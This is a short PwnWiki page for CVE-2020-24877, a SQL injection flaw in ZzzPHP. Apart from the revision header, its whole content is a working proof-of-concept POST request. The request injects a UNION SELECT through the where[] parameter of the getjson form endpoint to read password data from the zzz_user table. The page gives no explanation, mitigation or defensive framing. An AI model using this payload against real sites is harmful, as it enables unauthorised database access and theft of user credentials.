CVE-2020-24877 ZzzPHP Sqli漏洞

From PwnWiki
Revision as of 09:18, 19 March 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> POST /zzzphp/form/index.php?module=getjson table=gbook&where[]=1=1 union select password from zzz_user&col=1 </pre>")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

POST /zzzphp/form/index.php?module=getjson

table=gbook&where[]=1=1 union select password from zzz_user&col=1